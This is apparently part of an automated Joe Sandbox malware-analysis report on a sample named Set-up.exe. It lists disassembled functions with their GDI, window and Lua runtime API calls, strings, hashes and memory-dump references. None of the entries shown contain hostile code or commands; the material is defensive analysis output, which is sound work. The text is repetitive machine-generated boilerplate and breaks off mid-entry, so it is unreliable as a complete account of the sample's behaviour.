Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnmemcpy
String ID:
API String ID: 3533975685-0
Opcode ID: 22c27a23c8ba2807061d0ffd62afd544aa32c505b00337596845bf901b027610
Instruction ID: 1aac7f02be985c986b5a29edb5149ca551eea6c86bfbaa279e2ba9df4b1c609c
Opcode Fuzzy Hash: 22c27a23c8ba2807061d0ffd62afd544aa32c505b00337596845bf901b027610
Instruction Fuzzy Hash: 7C310872B00114ABC700EF7CDC85A6EB7A9EBC4761B14C279E92DDB385E930DD1483A0

Function 00A63A99 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

AlphaBlend.MSIMG32(?,?,?,00000000,?,?,00000000,00000000,00000000,?), ref: 00A63BA6
SelectObject.GDI32(?,?), ref: 00A63BC0
DeleteObject.GDI32(?), ref: 00A63BCB
DeleteDC.GDI32(?), ref: 00A63BD6

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: DeleteObject$AlphaBlendSelect
String ID:
API String ID: 2776048027-0
Opcode ID: 976b4eafe7c7c3a52f888c6ec1a5c2e4b5b5ac145b313b3019baaf444756adb8
Instruction ID: 387489a40ea61550265fd77d041a30320f2fe9d9d188e7ba83d6feca4bee095c
Opcode Fuzzy Hash: 976b4eafe7c7c3a52f888c6ec1a5c2e4b5b5ac145b313b3019baaf444756adb8
Instruction Fuzzy Hash: FD4102712097029FC724CF18C984A6AFBF9FF88704F04491DF99697211D732EA1ACB92

Function 00A64240 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A6426C
SelectObject.GDI32(?,?), ref: 00A64274
ExtTextOutW.GDI32(?,?,00000000,?,?,?,00000000,00000000), ref: 00A642F8
ExtTextOutA.GDI32(?,?,00000000,?,?,?,?,00000000), ref: 00A64340

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ObjectSelectText
String ID:
API String ID: 3628355225-0
Opcode ID: 77c45f5ad9820e85a53dcd24267afcbae817972d6a08d83f3ede91157ee0e3f1
Instruction ID: 2b989d1f0016a6f69fddbff7692926858ef14a8e496cae2848cd8edb9ee3851a
Opcode Fuzzy Hash: 77c45f5ad9820e85a53dcd24267afcbae817972d6a08d83f3ede91157ee0e3f1
Instruction Fuzzy Hash: A731377590020EABCF119FA4DC45AFEBBB5EF08310F1141A5FA09A7211DB359998CFA0

Function 00A644E0 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A64511
SelectObject.GDI32(?,?), ref: 00A64519
GetTextExtentPoint32A.GDI32(?,?,?,00000000), ref: 00A64551
GetTextExtentPoint32W.GDI32(?,?,?,00000000), ref: 00A64582

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ExtentObjectPoint32SelectText
String ID:
API String ID: 1470722260-0
Opcode ID: a45b34a2dd7be0dac1fea0678755c3c3fe44b49fa74e2ab3e92de505aa30646f
Instruction ID: 40bbd8f38384e6c52fcc7947ff119b0a6f6b465b0ff068ee80d7be7d3b08b50e
Opcode Fuzzy Hash: a45b34a2dd7be0dac1fea0678755c3c3fe44b49fa74e2ab3e92de505aa30646f
Instruction Fuzzy Hash: A2213475508385EFCB249F54D844AAABBF9FB48300F00885DF99E836A0DB30E894DF52

Function 00A73E00 Relevance: 6.1, APIs: 4, Instructions: 66windowCOMMON

Download Yara Rule

APIs

CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00A73E60
CreateCaret.USER32(?,00000000,?,?), ref: 00A73E7F
ShowCaret.USER32(?), ref: 00A73E96
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A73EBF

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CaretCreate$BitmapShow_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1464997198-0
Opcode ID: 8df18ef267ae417c559117162839281a9d16c21dcf6d639f7644560b72ff4aeb
Instruction ID: 26090474a452d3ca43a92e23dfed6d258607a981a3db225d3f5cf76394056eef
Opcode Fuzzy Hash: 8df18ef267ae417c559117162839281a9d16c21dcf6d639f7644560b72ff4aeb
Instruction Fuzzy Hash: 862105726006049FCB216F78CC05BEAB7EDFF40300F05C62DF5AA86290DBB1BA419B90

Function 00BDBAF0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00BDBC1B), ref: 00BDBB13
getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB3D
getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB53
getc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBB65

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: getc
String ID:
API String ID: 1447138685-0
Opcode ID: 29d382a8570c6704bd840381039a2d90bc320bfe05131649c6500cd2fcafa9aa
Instruction ID: 527480213b3bca851570e020c09240453b14ed2b71ddc203fa759333b56efae2
Opcode Fuzzy Hash: 29d382a8570c6704bd840381039a2d90bc320bfe05131649c6500cd2fcafa9aa
Instruction Fuzzy Hash: 0F11A0715001459BDB248B69DC80A69FBE4EB45320F2405BFD89E83390E736EC669755

Function 00A7FD80 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

_Query_perf_frequency.MSVCP140(00000000,00000000,?,?,00000000,00000000,00000000,00C00D70,000000FF,?,00AA9658,00000000,00000000), ref: 00A7FD90
_Query_perf_counter.MSVCP140(?,00000000,00000000,00000000,00C00D70,000000FF,?,00AA9658,00000000,00000000), ref: 00A7FD9E
__alldvrm.LIBCMT ref: 00A7FDA9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7FDCC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Query_perf_counterQuery_perf_frequencyUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID:
API String ID: 3135650852-0
Opcode ID: f0b1e34a9d52940fccef54298d1e6a8f155785f23272a26714fca8baeb113d71
Instruction ID: 5b381c66200ffbe9b35f9f0d457665f7eb1b3f171de33eff4b66ad302d59c8b7
Opcode Fuzzy Hash: f0b1e34a9d52940fccef54298d1e6a8f155785f23272a26714fca8baeb113d71
Instruction Fuzzy Hash: D3018FB26043086FD310EBA95C45F3BBAECEFC8764F05867ABA19D3351D6309C0486A5

Function 00A68940 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00A68956

Part of subcall function 00A69AE0: GetWindowRect.USER32(?,?), ref: 00A69B03
Part of subcall function 00A69AE0: SendMessageW.USER32(?,0000018E,00000000,00000000), ref: 00A69B3E
Part of subcall function 00A69AE0: SendMessageW.USER32(?,00000197,?,00000000), ref: 00A69B57

SendMessageW.USER32(?,00000186,?,00000000), ref: 00A6896F
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00A68990
InvalidateRect.USER32(?,00000000,00000001), ref: 00A68999

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: MessageSend$Rect$InvalidateWindow
String ID:
API String ID: 1011746805-0
Opcode ID: 7f43ab36ccc94b7413cbdf3d36b71af411b3c1768427185fcf2c408d582087be
Instruction ID: 4edb4dbb15841a134b10fe1380ad91a3797802ed921fd25b949652609c6ae991
Opcode Fuzzy Hash: 7f43ab36ccc94b7413cbdf3d36b71af411b3c1768427185fcf2c408d582087be
Instruction Fuzzy Hash: 81F0E771350205BBEB259B61CC86FAA7B2AFB84B54F104024F6055B5E0CBB2B860DA94

Function 00A63150 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,?), ref: 00A63162
DeleteObject.GDI32(00000000), ref: 00A6316B
CreatePen.GDI32(00000000,00000001,?), ref: 00A63186
SelectObject.GDI32(?,00000000), ref: 00A63193

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$Select$CreateDelete
String ID:
API String ID: 1326144132-0
Opcode ID: 8d76c50ad77864290e1914f017c6217b4644c6b332018060c35111ea07132fa0
Instruction ID: a99cb0c6a12ef0f5e41b93631d5a6fe5f7fa3377bea0f50ba784e617cbe1acf3
Opcode Fuzzy Hash: 8d76c50ad77864290e1914f017c6217b4644c6b332018060c35111ea07132fa0
Instruction Fuzzy Hash: FDF0AC71010700AFDB315FA0EC08B57BBF5FB04715F014A19FA9B41A60C7B1A559DB91

Function 00ACE7C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 405COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 00ACE82A
GetSysColor.USER32(00000014), ref: 00ACE834

Strings

gfff, xrefs: 00ACEB30

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Color
String ID: gfff
API String ID: 2811717613-1553575800
Opcode ID: 8f211ad2460312918d35a0d44a320f5dc6cf250f3dca144b0f2ff3b03ef9bced
Instruction ID: 2cdb83e932d9a2ba65c0a947450430c3db41375b17fc46ef3529489f24b5d74a
Opcode Fuzzy Hash: 8f211ad2460312918d35a0d44a320f5dc6cf250f3dca144b0f2ff3b03ef9bced
Instruction Fuzzy Hash: 05020675A01205CFCF14CF58C580AAABBF1FF48310F2585AAE859AB356D731ED55CBA0

Function 00BDC500 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

luaL_getsubtable.SET-UP(?,FFF0B9D8,_LOADED), ref: 00BDC515
lua_setglobal.SET-UP(?,00000010), ref: 00BDC68B

Strings

_LOADED, xrefs: 00BDC50A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_getsubtablelua_setglobal
String ID: _LOADED
API String ID: 422293290-1112303394
Opcode ID: 10d1d13f2bd020804387f6a49e67636e9c567dd5e25e536b48ee2d04e0afe713
Instruction ID: 690783594b8cf4870dc616a49acd612fe5f842bbca16b70cbd5c3095b7757453
Opcode Fuzzy Hash: 10d1d13f2bd020804387f6a49e67636e9c567dd5e25e536b48ee2d04e0afe713
Instruction Fuzzy Hash: 7D515E756002448BDB54DF29D891916B7E1EF84334B18C6AEE81A4F39BEB35E805CB91

Function 00A6C600 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00A6C65A
GetClientRect.USER32(?,?), ref: 00A6C780

Strings

W, xrefs: 00A6C6BA

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ClientRect
String ID: W
API String ID: 846599473-655174618
Opcode ID: d8b4fc9b9ca83006ef568788f9fc6763df9044c5e66781c0ed1f154f8bbddb58
Instruction ID: 03ba431d27bcae6da0327de17324506faa7302157e6fb5230dfae1c5a7ffa07c
Opcode Fuzzy Hash: d8b4fc9b9ca83006ef568788f9fc6763df9044c5e66781c0ed1f154f8bbddb58
Instruction Fuzzy Hash: 875102B4A01309DFDB18CFA4D998BAEBBB5FF48315F00446DE45AAB250DB74A944CF50

Function 00BDE280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C381E0,00000000,00000002,00000000), ref: 00BDE2C7

Part of subcall function 00BDC320: lua_checkstack.SET-UP(?,?), ref: 00BDC331
Part of subcall function 00BDC320: lua_pushcclosure.SET-UP(?,?,?), ref: 00BDC396

Strings

_VERSION, xrefs: 00BDE342
Lua 5.3, xrefs: 00BDE313

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_setfuncslua_checkstacklua_pushcclosure
String ID: Lua 5.3$_VERSION
API String ID: 49232431-1729770358
Opcode ID: bb14c78f7eafe093dd38014fc98d3656e9605220c67bc1c937270993c77ef372
Instruction ID: 64dfa02204c210a4434aaf0abc998cf7b93ef47b3a85312dd4901c962a4e39bc
Opcode Fuzzy Hash: bb14c78f7eafe093dd38014fc98d3656e9605220c67bc1c937270993c77ef372
Instruction Fuzzy Hash: E9213E747006448FD714DF28C451A1AF7E2EF48320B54C6ADE45A8B3D6EB74ED41CB89

Function 00A67BA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,00000028), ref: 00A67BDB
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00A67C35

Strings

(, xrefs: 00A67BB2

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Info$MonitorParametersSystem
String ID: (
API String ID: 84451619-3887548279
Opcode ID: c4781ad7594e0e6a74186e5ef28233eff853f9b6c88e1c9e95a14fb4e69ba68e
Instruction ID: def19a2496a1a591fc51696ee1e8781406191e156cd72cf870cbbb666ddf255b
Opcode Fuzzy Hash: c4781ad7594e0e6a74186e5ef28233eff853f9b6c88e1c9e95a14fb4e69ba68e
Instruction Fuzzy Hash: 0831D6B5E042189FDB44CFA9D845BAEBBF5FB48310F11806AE809A7350DB759944CFA4

Function 00BDC0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

luaL_callmeta.SET-UP(?,?,__tostring,?,?), ref: 00BDC0C9

Part of subcall function 00BDBFA0: luaL_getmetafield.SET-UP(?,?,?), ref: 00BDBFCB

lua_tolstring.SET-UP(?,000000FF,?), ref: 00BDC2E3
luaL_error.SET-UP(?,'__tostring' must return a string,?,?), ref: 00BDC2F8

Strings

'__tostring' must return a string, xrefs: 00BDC2F2
__name, xrefs: 00BDC205
true, xrefs: 00BDC1B2
nil, xrefs: 00BDC1CD
false, xrefs: 00BDC1B9, 00BDC1BE
object length is not an integer, xrefs: 00BDC0A0
%s: %p, xrefs: 00BDC28E
__tostring, xrefs: 00BDC0C2

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_callmetaL_errorL_getmetafieldlua_tolstring
String ID: %s: %p$'__tostring' must return a string$__name$__tostring$false$nil$object length is not an integer$true
API String ID: 1407362100-553602133
Opcode ID: c1056f927186c779bafc83ef09da48de73d3e33df7741310369d4b1ae3c4922a
Instruction ID: f936a8f0085d4a88c32312766296e05710a1f2e7ebee25a94a99ec1e00455c9d
Opcode Fuzzy Hash: c1056f927186c779bafc83ef09da48de73d3e33df7741310369d4b1ae3c4922a
Instruction Fuzzy Hash: FFF05473501105538E105A695C42C57FBCCDA51330B1403B7FC3CD63D5F920D954C2E6

Function 00BDAE30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

luaL_testudata.SET-UP(?,?,?), ref: 00BDAE3D

Part of subcall function 00BDAD70: lua_getmetatable.SET-UP(?,?), ref: 00BDADA8

Strings

number has no integer representation, xrefs: 00BDB174
not enough memory for buffer allocation, xrefs: 00BDB2EE

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
